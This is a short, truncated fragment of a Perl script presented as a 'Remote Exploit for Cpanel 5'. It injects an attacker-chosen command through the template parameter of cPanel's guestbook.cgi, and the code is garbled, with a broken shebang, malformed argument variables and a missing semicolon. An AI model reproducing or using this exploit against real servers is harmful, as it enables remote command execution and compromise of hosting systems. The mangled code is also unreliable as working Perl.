cpanel-VH.pl
!usr/bin/perl use LWP::UserAgent print "\n"; print " \n"; print " Remote Exploit for Cpanel 5 \n"; print " \n"; print "\n"; print " C0d3r: CaMaLeoN\n"; die "Use: $0 \n" unless $ARGV1; $web=$ARGV0; $comando=$ARGV1; $fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";...